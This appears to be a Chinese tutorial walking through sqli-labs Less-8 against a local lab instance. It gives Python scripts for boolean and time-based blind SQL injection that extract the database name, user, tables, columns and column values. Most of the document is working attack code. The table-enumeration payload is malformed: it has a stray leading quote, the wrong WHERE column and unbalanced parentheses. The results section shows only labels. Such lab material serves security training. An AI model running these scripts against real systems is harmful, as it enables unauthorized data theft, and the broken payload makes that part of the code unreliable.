在 sqli-labs 的第 8 题中，页面没有回显，可以尝试用盲注的手法获取数据。
观察到页面加载耗时约 3 秒，说明可以进行盲注。
布尔盲注数据库名
import requests
def inject_database(url: str) -> None:
    """Recover the current database name one character at a time (boolean oracle).

    The lab page contains the text "You are in..........." when the
    injected comparison is true and not otherwise; that string is the
    oracle. Each character is found by binary search over the ASCII range
    [32, 128), so one character costs at most about seven requests.
    Positions 1..14 are probed; a position that resolves to 32 (space) is
    taken as the end of the name and stops the loop.

    Args:
        url: base URL of the lab page. The payload is passed as the raw
            query string (positional `params` argument of requests.get).

    Side effects: one HTTP GET per probe; prints the partial name after
    each recovered character. Returns None — the later version of this
    function on the page returns the name instead.
    """
    dataname = ''
    for i in range(1, 15):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            # Probe: is ASCII(character i of database()) > mid ?
            path = "id=1' and ascii(substr(database(),%d, 1)) > %d-- " % (i, mid)
            r = requests.get(url, path)
            if "You are in..........." in r.text:
                # Oracle true: the character lies above mid.
                low = mid + 1
            else:
                # Oracle false: the character is at most mid.
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            # Space is treated as end of string.
            break
        dataname += chr(mid)
        print(dataname)
if __name__ == '__main__':
    # Local sqli-labs instance, exercise Less-8 (the blind-injection lab).
    url = 'http://127.0.0.1:8989/Less-8/'
    inject_database(url)
结果
用时间盲注出用户名
import requests
import time
def inject_user(url: str) -> None:
    """Recover the value of user() one character at a time (time-based oracle).

    No page text is used as a signal here: the payload makes the database
    sleep(1) when the comparison is true, and a round trip that takes more
    than one second is read as "true". Each character is found by binary
    search over ASCII [32, 128); positions 1..14 are probed and a position
    that resolves to 32 (space) ends the search. Seen from the server this
    is a burst of requests to one endpoint that differ only in the two
    integers i and mid, with the latency of each one either at baseline or
    roughly one second above it.

    Args:
        url: base URL of the lab page; the payload is sent as the `id`
            query parameter.

    Side effects: one HTTP GET per probe; prints the partial value after
    each recovered character.
    """
    user = ''
    for i in range(1, 15):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            # True branch of the if() delays the response by one second.
            payload = f"1' and if(ascii(substr(user(), {i}, 1)) > {mid},sleep(1),0)-- "
            res = {"id": payload}
            start_time = time.time()
            r = requests.get(url, params=res)
            if (time.time() - start_time) > 1:
                # Delay observed: the character lies above mid.
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            # Space is treated as end of string.
            break
        user += chr(mid)
        print(user)
if __name__ == '__main__':
    # Same local sqli-labs Less-8 instance as above.
    url = 'http://127.0.0.1:8989/Less-8/'
    inject_user(url)
结果
用盲注的方式查询表、列、具体数据
if __name__ == '__main__':
    # Driver that chains the four inject_* helpers defined further down
    # the page: database name -> tables -> columns -> column values.
    url = 'http://127.0.0.1:8989/Less-8/'
    # Current database name
    database_name = inject_database(url)
    print(f"Database name: {database_name}")
    # Table names in that database
    tables = inject_tables(url, database_name)
    print(f"Tables in database '{database_name}': {tables}")
    # Column names of one table
    table_name = 'users'  # replace with the target table name
    columns = inject_columns(url, table_name)
    print(f"Columns in table '{table_name}': {columns}")
    # Values of one column of that table
    column_name = 'username'  # replace with the target column name
    data = inject_data(url, table_name, column_name)
    print(f"Data in column '{column_name}' of table '{table_name}': {data}")
时间检测模块
# 发送请求并检查响应时间
def check_time_injection(url: str, payload: str) -> bool:
    """Send one probe and report whether the response was delayed.

    Args:
        url: base URL of the lab page.
        payload: value sent as the `id` query parameter.

    Returns:
        True when the round trip took more than one second. The threshold
        pairs with the sleep(1) used in the callers' payloads; nothing in
        this function separates the injected delay from ordinary latency.
    """
    res = {"id": payload}
    start_time = time.time()
    r = requests.get(url, params=res)
    elapsed_time = time.time() - start_time
    return elapsed_time > 1  # a delay above one second is taken as "query true"
数据库模块
# 获取当前数据库名
def inject_database(url: str) -> str:
    """Recover the current database name one character at a time (boolean oracle).

    The lab page contains "You are in..........." when the injected
    comparison is true; that text is the oracle. Each character is found
    by binary search over ASCII [32, 128); positions 1..14 are probed and
    a position that resolves to 32 (space) ends the loop.

    Args:
        url: base URL of the lab page; the payload is sent as the `id`
            query parameter.

    Returns:
        The recovered name (possibly empty if the first position resolves
        to a space).

    Side effects: one HTTP GET per probe; prints the partial name after
    each recovered character.
    """
    dataname = ''
    for i in range(1, 15):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            # Probe: is ASCII(character i of database()) > mid ?
            payload = "1' and ascii(substr(database(),%d, 1)) > %d-- " % (i, mid)
            res = {"id": payload}
            r = requests.get(url, params=res)
            if "You are in..........." in r.text:
                # Oracle true: the character lies above mid.
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            # Space is treated as end of string.
            break
        dataname += chr(mid)
        print(dataname)
    return dataname
数据库中表名模块
# 获取指定数据库中的表名
def inject_tables(url: str, database_name: str) -> list[str]:
    """Enumerate table names via the time-based oracle in check_time_injection.

    Tables are read one at a time using a LIMIT offset (table_index - 1);
    each name is recovered character by character with a binary search
    over ASCII [32, 128), up to 19 positions (range(1, 20)). A position
    that resolves to 32 (space) ends the current name, and an empty name
    ends the enumeration.

    Args:
        url: base URL of the lab page.
        database_name: value interpolated into the payload's WHERE clause
            exactly as written on the payload line.

    Returns:
        The list of recovered names, in offset order.

    Side effects: one HTTP GET per probe; prints progress after every
    character and after every completed name.
    """
    tables = []
    table_index = 0
    while True:
        table_index += 1
        table_name = ''
        for i in range(1, 20):  # assumes a table name is at most 20 characters
            low = 32
            high = 128
            while low < high:
                mid = (low + high) // 2
                payload = f",' and if(ascii(substr(select table_name from information_schema.tables where table_name='{database_name}' limit {table_index-1},1),{i},1 > {mid},sleep(1),0)-- "
                if check_time_injection(url, payload):
                    # Delay observed: the character lies above mid.
                    low = mid + 1
                else:
                    high = mid
            if low == 32:  # ASCII 32 is a space, taken as end of the name
                break
            table_name += chr(low)
            print(f"Current table name: {table_name}")
        if table_name:
            tables.append(table_name)
            print(f"Found table: {table_name}")
        else:
            # No characters recovered at this offset: no more tables.
            break
    return tables
列名模块
def inject_columns(url: str, table_name: str) -> list[str]:
    """Enumerate column names of one table via the time-based oracle.

    Columns are read one at a time from information_schema.columns using
    a LIMIT offset (column_index - 1); each name is recovered character by
    character with a binary search over ASCII [32, 128), up to 19
    positions (range(1, 20)). A position that resolves to 32 (space) ends
    the current name, and an empty name ends the enumeration.

    Args:
        url: base URL of the lab page.
        table_name: value interpolated, single-quoted, into the payload's
            WHERE clause.

    Returns:
        The list of recovered column names, in offset order.

    Side effects: one HTTP GET per probe; prints progress after every
    character and after every completed name.
    """
    columns = []
    column_index = 0
    while True:
        column_index += 1
        column_name = ''
        for i in range(1, 20):  # assumes a column name is at most 20 characters
            low = 32
            high = 128
            while low < high:
                mid = (low + high) // 2
                payload = f"1' and if(ascii(substr((select column_name from information_schema.columns where table_name='{table_name}' limit {column_index-1},1),{i},1)) > {mid},sleep(1),0) -- "
                if check_time_injection(url, payload):
                    # Delay observed: the character lies above mid.
                    low = mid + 1
                else:
                    high = mid
            if low == 32:  # ASCII 32 is a space, taken as end of the name
                break
            column_name += chr(low)
            print(f"Current column name: {column_name}")
        if column_name:
            columns.append(column_name)
            print(f"Found column: {column_name}")
        else:
            # No characters recovered at this offset: no more columns.
            break
    return columns
指定查询数据模块
# 获取指定表中特定列的数据
def inject_data(url: str, table_name: str, column_name: str) -> list[str]:
    """Read the values of one column, row by row, via the time-based oracle.

    Rows are selected with a LIMIT offset (row_index - 1); each value is
    recovered character by character with a binary search over ASCII
    [32, 128), up to 19 positions (range(1, 20)). A position that resolves
    to 32 (space) ends the current value, and an empty value ends the
    enumeration.

    Args:
        url: base URL of the lab page.
        table_name: interpolated unquoted into the payload's FROM clause.
        column_name: interpolated unquoted into the payload's SELECT list.

    Returns:
        The list of recovered values, in row-offset order.

    Side effects: one HTTP GET per probe; prints progress after every
    character and after every completed value.
    """
    data = []
    row_index = 0
    while True:
        row_index += 1
        row_value = ''
        for i in range(1, 20):  # assumes a value is at most 20 characters
            low = 32
            high = 128
            while low < high:
                mid = (low + high) // 2
                payload = f"1' and if(ascii(substr((select {column_name} from {table_name} limit {row_index-1},1),{i},1)) > {mid},sleep(1),0) -- "
                if check_time_injection(url, payload):
                    # Delay observed: the character lies above mid.
                    low = mid + 1
                else:
                    high = mid
            if low == 32:  # ASCII 32 is a space, taken as end of the value
                break
            row_value += chr(low)
            print(f"Current row value: {row_value}")
        if row_value:
            data.append(row_value)
            print(f"Found data: {row_value}")
        else:
            # No characters recovered at this offset: no more rows.
            break
    return data
结果
数据库
列
user